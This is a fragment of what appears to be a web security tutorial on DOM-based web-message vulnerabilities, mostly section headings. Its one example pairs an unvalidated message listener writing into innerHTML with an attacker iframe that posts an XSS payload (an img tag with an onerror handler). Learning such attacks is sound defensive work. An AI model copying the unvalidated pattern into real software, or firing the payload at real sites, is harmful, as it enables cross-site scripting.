DOM-based
Taint-flow
Web messages
Example 1 (no validation)
<script>
window.addEventListener('message', function(e) {
document.getElementById('name').innerHTML = e.data;
})
</script><iframe src="https://vulnerable-site.com" onload="this.contentWindow.postMessage('<img src=x onerror=print()>','*')">Example 2 (broken URL validation)
Open redirect
Cookie manipulation
DOM clobbering
Other DOM-based vulnerabilities
Last updated